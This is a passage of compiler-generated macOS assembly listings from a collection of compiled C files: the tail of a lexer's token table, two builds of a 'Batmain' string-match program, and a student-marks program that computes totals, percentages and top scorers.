"plus_range" L_.str.130: ## @.str.130 .asciz "-:" L_.str.131: ## @.str.131 .asciz "minus_range" L_.str.132: ## @.str.132 .asciz "->" L_.str.133: ## @.str.133 .asciz "emit" L_.str.134: ## @.str.134 .asciz "/=" L_.str.135: ## @.str.135 .asciz ":=" L_.str.136: ## @.str.136 .asciz "Cassign" L_.str.137: ## @.str.137 .asciz "<<" L_.str.138: ## @.str.138 .asciz "shift_left" L_.str.139: ## @.str.139 .asciz "<=" L_.str.140: ## @.str.140 .asciz "Assign" L_.str.141: ## @.str.141 .asciz "<>" L_.str.142: ## @.str.142 .asciz "sm_gr" L_.str.143: ## @.str.143 .asciz "==" L_.str.144: ## @.str.144 .asciz "eq_eq" L_.str.145: ## @.str.145 .asciz "=>" L_.str.146: ## @.str.146 .asciz "Arrow" L_.str.147: ## @.str.147 .asciz ">=" L_.str.148: ## @.str.148 .asciz "gr_eq" L_.str.149: ## @.str.149 .asciz ">>" L_.str.150: ## @.str.150 .asciz "shift_right" L_.str.151: ## @.str.151 .asciz "||" L_.str.152: ## @.str.152 .asciz "or_or" .subsections_via_symbols
the_stack_data/100139414.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #24] mov x9, sp add x8, sp, #20 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #20] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_6 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 mov x9, sp add x8, sp, #30 str x8, [sp, #8] ; 8-byte Folded Spill str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldr x0, [sp, #8] ; 8-byte Folded Reload adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB0_5 LBB0_4: ; in Loop: Header=BB0_1 Depth=1 adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf b LBB0_5 LBB0_5: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #20] subs w8, w8, #1 str w8, [sp, #20] b LBB0_1 LBB0_6: ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_8 b LBB0_7 LBB0_7: bl ___stack_chk_fail LBB0_8: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%s" l_.str.2: ; @.str.2 .asciz "Batmain" l_.str.3: ; @.str.3 .asciz "Y\n" l_.str.4: ; @.str.4 .asciz "N\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -52(%rbp) leaq L_.str(%rip), %rdi leaq -56(%rbp), %rsi movb $0, %al callq _scanf LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $0, -56(%rbp) je LBB0_6 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 leaq -48(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _scanf leaq -48(%rbp), %rdi leaq L_.str.2(%rip), %rsi callq _strcmp cmpl $0, %eax je LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf jmp LBB0_5 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf LBB0_5: ## in Loop: Header=BB0_1 Depth=1 movl -56(%rbp), %eax addl $-1, %eax movl %eax, -56(%rbp) jmp LBB0_1 LBB0_6: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_8 ## %bb.7: xorl %eax, %eax addq $64, %rsp popq %rbp retq LBB0_8: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%s" L_.str.2: ## @.str.2 .asciz "Batmain" L_.str.3: ## @.str.3 .asciz "Y\n" L_.str.4: ## @.str.4 .asciz "N\n" .subsections_via_symbols
the_stack_data/358009.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 mov w9, #12144 adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 sub sp, sp, #2, lsl #12 ; =8192 sub sp, sp, #3952 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp add x8, sp, #44 str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF str x0, [sp, #16] ; 8-byte Folded Spill bl _scanf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF str x0, [sp, #24] ; 8-byte Folded Spill bl _printf ldr w1, [sp, #44] add x0, sp, #56 str x0, [sp, #32] ; 8-byte Folded Spill bl _input_students adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldr x0, [sp, #16] ; 8-byte Folded Reload mov x9, sp add x8, sp, #40 str x8, [x9] bl _scanf ldr x0, [sp, #24] ; 8-byte Folded Reload bl _printf ldr x0, [sp, #32] ; 8-byte Folded Reload ldr w1, [sp, #40] bl _input_subjects ldr x0, [sp, #32] ; 8-byte Folded Reload ldr w1, [sp, #44] ldr w2, [sp, #40] bl _input_marks ldr x0, [sp, #32] ; 8-byte Folded Reload ldr w1, [sp, #44] ldr w2, [sp, #40] bl _calculate ldr x0, [sp, #32] ; 8-byte Folded Reload ldr w1, [sp, #44] ldr w2, [sp, #40] bl _print_results ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: bl ___stack_chk_fail LBB0_2: mov w0, #0 add sp, sp, #2, lsl #12 ; =8192 add sp, sp, #3952 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _input_students ; -- Begin function input_students .p2align 2 _input_students: ; @input_students .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf stur wzr, [x29, #-16] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-16] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_4 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-16] add w10, w8, #1 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf ldur x8, [x29, #-8] ldursw x9, [x29, #-16] mov x10, #604 str x10, [sp, #16] ; 8-byte Folded Spill mul x9, x9, x10 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF str x0, [sp, #24] ; 8-byte Folded Spill bl _scanf ldur w8, [x29, #-16] add w10, w8, #1 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf ldr x10, [sp, #16] ; 8-byte Folded Reload ldr x0, [sp, #24] ; 8-byte Folded Reload ldur x8, [x29, #-8] ldursw x9, [x29, #-16] mul x9, x9, x10 add x8, x8, x9 add x8, x8, #20 mov x9, sp str x8, [x9] bl _scanf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB1_1 LBB1_4: ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _input_subjects ; -- Begin function input_subjects .p2align 2 _input_subjects: ; @input_subjects .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _printf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf str wzr, [sp, #16] b LBB2_1 LBB2_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #16] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_4 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #16] add w10, w8, #1 mov x9, sp ; implicit-def: $x8 mov x8, x10 str x8, [x9] adrp x0, l_.str.9@PAGE add x0, x0, l_.str.9@PAGEOFF bl _printf ldur x8, [x29, #-8] ldrsw x9, [sp, #16] mov x10, #604 mul x9, x9, x10 add x8, x8, x9 add x8, x8, #124 ldrsw x9, [sp, #16] mov x10, #24 mul x9, x9, x10 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _scanf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB2_3 LBB2_3: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB2_1 LBB2_4: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _input_marks ; -- Begin function input_marks .p2align 2 _input_marks: ; @input_marks .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur w1, [x29, #-12] stur w2, [x29, #-16] stur wzr, [x29, #-20] b LBB3_1 LBB3_1: ; =>This Loop Header: Depth=1 ; Child Loop BB3_3 Depth 2 ldur w8, [x29, #-20] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB3_8 b LBB3_2 LBB3_2: ; in Loop: Header=BB3_1 Depth=1 ldur w8, [x29, #-20] add w12, w8, #1 ldur x8, [x29, #-8] ldursw x9, [x29, #-20] mov x11, #604 mul x9, x9, x11 add x10, x8, x9 ldur x8, [x29, #-8] ldursw x9, [x29, #-20] mul x9, x9, x11 add x8, x8, x9 add x8, x8, #20 mov x9, sp ; implicit-def: $x11 mov x11, x12 str x11, [x9] str x10, [x9, #8] str x8, [x9, #16] adrp x0, l_.str.10@PAGE add x0, x0, l_.str.10@PAGEOFF bl _printf stur wzr, [x29, #-24] b LBB3_3 LBB3_3: ; Parent Loop BB3_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-24] ldur w9, [x29, #-16] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB3_6 b LBB3_4 LBB3_4: ; in Loop: Header=BB3_3 Depth=2 ldur x8, [x29, #-8] ldursw x9, [x29, #-24] mov x10, #604 str x10, [sp, #32] ; 8-byte Folded Spill mul x9, x9, x10 add x8, x8, x9 add x8, x8, #124 ldursw x9, [x29, #-24] mov x10, #24 mul x9, x9, x10 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.11@PAGE add x0, x0, l_.str.11@PAGEOFF bl _printf ldr x10, [sp, #32] ; 8-byte Folded Reload ldur x8, [x29, #-8] ldursw x9, [x29, #-20] mul x9, x9, x10 add x8, x8, x9 add x8, x8, #40 ldursw x9, [x29, #-24] add x8, x8, x9, lsl #2 mov x9, sp str x8, [x9] adrp x0, l_.str.12@PAGE add x0, x0, l_.str.12@PAGEOFF bl _scanf b LBB3_5 LBB3_5: ; in Loop: Header=BB3_3 Depth=2 ldur w8, [x29, #-24] add w8, w8, #1 stur w8, [x29, #-24] b LBB3_3 LBB3_6: ; in Loop: Header=BB3_1 Depth=1 adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB3_7 LBB3_7: ; in Loop: Header=BB3_1 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB3_1 LBB3_8: ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _calculate ; -- Begin function calculate .p2align 2 _calculate: ; @calculate .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _subject_total@GOTPAGE ldr x8, [x8, _subject_total@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill adrp x8, _student_total@GOTPAGE ldr x8, [x8, _student_total@GOTPAGEOFF] str x8, [sp, #8] ; 8-byte Folded Spill stur x0, [x29, #-8] stur w1, [x29, #-12] stur w2, [x29, #-16] stur wzr, [x29, #-20] b LBB4_1 LBB4_1: ; =>This Loop Header: Depth=1 ; Child Loop BB4_3 Depth 2 ldur w8, [x29, #-20] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_8 b LBB4_2 LBB4_2: ; in Loop: Header=BB4_1 Depth=1 ldr x8, [sp, #8] ; 8-byte Folded Reload movi d0, #0000000000000000 str s0, [x8] str wzr, [sp, #24] b LBB4_3 LBB4_3: ; Parent Loop BB4_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #24] ldur w9, [x29, #-16] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_6 b LBB4_4 LBB4_4: ; in Loop: Header=BB4_3 Depth=2 ldr x8, [sp, #8] ; 8-byte Folded Reload ldur x9, [x29, #-8] ldursw x10, [x29, #-20] mov x11, #604 mul x10, x10, x11 add x9, x9, x10 add x9, x9, #40 ldrsw x10, [sp, #24] ldr s1, [x9, x10, lsl #2] ldr s0, [x8] fadd s0, s0, s1 str s0, [x8] b LBB4_5 LBB4_5: ; in Loop: Header=BB4_3 Depth=2 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB4_3 LBB4_6: ; in Loop: Header=BB4_1 Depth=1 ldr x8, [sp, #8] ; 8-byte Folded Reload ldr s0, [x8] ldursw x9, [x29, #-20] adrp x8, _students_total@GOTPAGE ldr x8, [x8, _students_total@GOTPAGEOFF] str s0, [x8, x9, lsl #2] b LBB4_7 LBB4_7: ; in Loop: Header=BB4_1 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_1 LBB4_8: adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf stur wzr, [x29, #-20] b LBB4_9 LBB4_9: ; =>This Loop Header: Depth=1 ; Child Loop BB4_11 Depth 2 ldur w8, [x29, #-20] ldur w9, [x29, #-16] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_18 b LBB4_10 LBB4_10: ; in Loop: Header=BB4_9 Depth=1 ldr x8, [sp] ; 8-byte Folded Reload movi d0, #0000000000000000 str s0, [x8] str wzr, [sp, #24] b LBB4_11 LBB4_11: ; Parent Loop BB4_9 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #24] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB4_16 b LBB4_12 LBB4_12: ; in Loop: Header=BB4_11 Depth=2 ldr x8, [sp] ; 8-byte Folded Reload ldur x9, [x29, #-8] ldrsw x11, [sp, #24] mov x10, #604 mul x11, x11, x10 add x9, x9, x11 add x9, x9, #40 ldursw x11, [x29, #-20] ldr s1, [x9, x11, lsl #2] ldr s0, [x8] fadd s0, s0, s1 str s0, [x8] ldur x8, [x29, #-8] ldrsw x9, [sp, #24] mul x9, x9, x10 add x8, x8, x9 add x8, x8, #40 ldursw x9, [x29, #-20] ldr s0, [x8, x9, lsl #2] adrp x8, _student_highest@PAGE ldr s1, [x8, _student_highest@PAGEOFF] fcmp s0, s1 cset w8, le tbnz w8, #0, LBB4_14 b LBB4_13 LBB4_13: ; in Loop: Header=BB4_11 Depth=2 ldur x8, [x29, #-8] ldrsw x9, [sp, #24] mov x10, #604 mul x9, x9, x10 add x8, x8, x9 add x8, x8, #40 ldursw x9, [x29, #-20] ldr s0, [x8, x9, lsl #2] adrp x8, _student_highest@PAGE str s0, [x8, _student_highest@PAGEOFF] ldr w8, [sp, #24] str w8, [sp, #20] b LBB4_14 LBB4_14: ; in Loop: Header=BB4_11 Depth=2 b LBB4_15 LBB4_15: ; in Loop: Header=BB4_11 Depth=2 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB4_11 LBB4_16: ; in Loop: Header=BB4_9 Depth=1 ldr x8, [sp] ; 8-byte Folded Reload ldr w9, [sp, #20] ldursw x11, [x29, #-20] adrp x10, _student_highest_index@GOTPAGE ldr x10, [x10, _student_highest_index@GOTPAGEOFF] str w9, [x10, x11, lsl #2] adrp x9, _student_highest@PAGE movi d0, #0000000000000000 str s0, [x9, _student_highest@PAGEOFF] ldr s0, [x8] ldursw x9, [x29, #-20] adrp x8, _subjects_total@GOTPAGE ldr x8, [x8, _subjects_total@GOTPAGEOFF] str s0, [x8, x9, lsl #2] b LBB4_17 LBB4_17: ; in Loop: Header=BB4_9 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB4_9 LBB4_18: ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _print_results ; -- Begin function print_results .p2align 2 _print_results: ; @print_results .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _students_total@GOTPAGE ldr x8, [x8, _students_total@GOTPAGEOFF] str x8, [sp, #24] ; 8-byte Folded Spill stur x0, [x29, #-8] stur w1, [x29, #-12] stur w2, [x29, #-16] adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF bl _printf stur wzr, [x29, #-20] b LBB5_1 LBB5_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-20] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB5_4 b LBB5_2 LBB5_2: ; in Loop: Header=BB5_1 Depth=1 ldur x8, [x29, #-8] ldursw x9, [x29, #-20] mov x11, #604 mul x9, x9, x11 add x10, x8, x9 ldur x8, [x29, #-8] ldursw x9, [x29, #-20] mul x9, x9, x11 add x8, x8, x9 add x8, x8, #20 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF bl _printf ldr x8, [sp, #24] ; 8-byte Folded Reload ldursw x9, [x29, #-20] ldr s0, [x8, x9, lsl #2] fcvt d0, s0 mov x8, sp str d0, [x8] adrp x0, l_.str.15@PAGE add x0, x0, l_.str.15@PAGEOFF bl _printf ldr x8, [sp, #24] ; 8-byte Folded Reload ldursw x9, [x29, #-20] ldr s0, [x8, x9, lsl #2] ldur w8, [x29, #-16] mov w9, #100 mul w8, w8, w9 scvtf s1, w8 fdiv s0, s0, s1 mov w8, #1120403456 fmov s1, w8 fmul s0, s0, s1 fcvt d0, s0 mov x8, sp str d0, [x8] adrp x0, l_.str.16@PAGE add x0, x0, l_.str.16@PAGEOFF bl _printf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB5_3 LBB5_3: ; in Loop: Header=BB5_1 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB5_1 LBB5_4: adrp x0, l_.str.17@PAGE add x0, x0, l_.str.17@PAGEOFF bl _printf stur wzr, [x29, #-20] b LBB5_5 LBB5_5: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-20] ldur w9, [x29, #-16] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB5_8 b LBB5_6 LBB5_6: ; in Loop: Header=BB5_5 Depth=1 ldur x8, [x29, #-8] ldursw x9, [x29, #-20] mov x10, #604 mul x9, x9, x10 add x8, x8, x9 add x8, x8, #124 ldursw x9, [x29, #-20] mov x10, #24 mul x9, x9, x10 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.18@PAGE add x0, x0, l_.str.18@PAGEOFF bl _printf ldursw x9, [x29, #-20] adrp x8, _subjects_total@GOTPAGE ldr x8, [x8, _subjects_total@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill ldr s0, [x8, x9, lsl #2] fcvt d0, s0 mov x8, sp str d0, [x8] adrp x0, l_.str.15@PAGE add x0, x0, l_.str.15@PAGEOFF bl _printf ldr x8, [sp, #16] ; 8-byte Folded Reload ldursw x9, [x29, #-20] ldr s0, [x8, x9, lsl #2] ldur w8, [x29, #-16] mov w9, #100 mul w8, w8, w9 scvtf s1, w8 fdiv s0, s0, s1 mov w8, #1120403456 fmov s1, w8 fmul s0, s0, s1 fcvt d0, s0 mov x8, sp str d0, [x8] adrp x0, l_.str.16@PAGE add x0, x0, l_.str.16@PAGEOFF bl _printf adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB5_7 LBB5_7: ; in Loop: Header=BB5_5 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB5_5 LBB5_8: adrp x0, l_.str.19@PAGE add x0, x0, l_.str.19@PAGEOFF bl _printf stur wzr, [x29, #-20] b LBB5_9 LBB5_9: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-20] ldur w9, [x29, #-16] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB5_12 b LBB5_10 LBB5_10: ; in Loop: Header=BB5_9 Depth=1 ldur x8, [x29, #-8] ldursw x9, [x29, #-20] mov x11, #604 mul x9, x9, x11 add x8, x8, x9 add x8, x8, #124 ldursw x9, [x29, #-20] mov x10, #24 mul x9, x9, x10 add x10, x8, x9 ldur x8, [x29, #-8] ldursw x12, [x29, #-20] adrp x9, _student_highest_index@GOTPAGE ldr x9, [x9, _student_highest_index@GOTPAGEOFF] ldrsw x9, [x9, x12, lsl #2] mul x9, x9, x11 add x8, x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.20@PAGE add x0, x0, l_.str.20@PAGEOFF bl _printf b LBB5_11 LBB5_11: ; in Loop: Header=BB5_9 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB5_9 LBB5_12: adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf adrp x0, l_.str.21@PAGE add x0, x0, l_.str.21@PAGEOFF bl _printf movi d0, #0000000000000000 stur s0, [x29, #-28] stur wzr, [x29, #-20] b LBB5_13 LBB5_13: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-20] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB5_18 b LBB5_14 LBB5_14: ; in Loop: Header=BB5_13 Depth=1 ldr x8, [sp, #24] ; 8-byte Folded Reload ldursw x9, [x29, #-20] ldr s0, [x8, x9, lsl #2] ldur s1, [x29, #-28] fcmp s0, s1 cset w8, le tbnz w8, #0, LBB5_16 b LBB5_15 LBB5_15: ; in Loop: Header=BB5_13 Depth=1 ldr x8, [sp, #24] ; 8-byte Folded Reload ldursw x9, [x29, #-20] ldr s0, [x8, x9, lsl #2] stur s0, [x29, #-28] ldur w8, [x29, #-20] adrp x9, _student_highest_total_index@GOTPAGE ldr x9, [x9, _student_highest_total_index@GOTPAGEOFF] str w8, [x9] b LBB5_16 LBB5_16: ; in Loop: Header=BB5_13 Depth=1 b LBB5_17 LBB5_17: ; in Loop: Header=BB5_13 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB5_13 LBB5_18: ldur x8, [x29, #-8] adrp x9, _student_highest_total_index@GOTPAGE ldr x9, [x9, _student_highest_total_index@GOTPAGEOFF] ldrsw x9, [x9] mov x10, #604 mul x9, x9, x10 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.22@PAGE add x0, x0, l_.str.22@PAGEOFF bl _printf ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _student_highest ; @student_highest .zerofill __DATA,__common,_student_highest,4,2 .globl _subject_highest ; @subject_highest .zerofill __DATA,__common,_subject_highest,4,2 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Enter number of students (less than 20): \n" l_.str.1: ; @.str.1 .asciz "%d" l_.str.2: ; @.str.2 .asciz "\n" l_.str.3: ; @.str.3 .asciz "Enter number of subjects per student (less than 10): \n" l_.str.4: ; @.str.4 .asciz "Enter student details: \n" l_.str.5: ; @.str.5 .asciz "Enter student %d name: \n" l_.str.6: ; @.str.6 .asciz "%s" l_.str.7: ; @.str.7 .asciz "Enter student %d roll: \n" l_.str.8: ; @.str.8 .asciz "Enter subject details: \n" l_.str.9: ; @.str.9 .asciz "Enter subject %d name: \n" l_.str.10: ; @.str.10 .asciz "Enter student %d, %s, %s for the following subjects: \n" l_.str.11: ; @.str.11 .asciz "%s marks: " l_.str.12: ; @.str.12 .asciz "%f" .comm _student_total,4,2 ; @student_total .comm _students_total,80,2 ; @students_total .comm _subject_total,4,2 ; @subject_total .comm _student_highest_index,80,2 ; @student_highest_index .comm _subjects_total,80,2 ; @subjects_total l_.str.13: ; @.str.13 .asciz "Total - Marks of Students: \n\n" l_.str.14: ; @.str.14 .asciz "Marks of %s, Roll: %s\n" l_.str.15: ; @.str.15 .asciz "Total: %f\n" l_.str.16: ; @.str.16 .asciz "Percentage: %f\n" l_.str.17: ; @.str.17 .asciz "Total - Marks of Subjects: \n\n" l_.str.18: ; @.str.18 .asciz "Marks of %s: \n" l_.str.19: ; @.str.19 .asciz "Subject wise - Highest: \n\n" l_.str.20: ; @.str.20 .asciz "Highest in %s is %s\n" l_.str.21: ; @.str.21 .asciz "Student wise - Overall Highest: \n\n" .comm _student_highest_total_index,4,2 ; @student_highest_total_index l_.str.22: ; @.str.22 .asciz "%s\n" .comm _subject_highest_index,80,2 ; @subject_highest_index .comm _subject_highest_total_index,4,2 ; @subject_highest_total_index .subsections_via_symbols
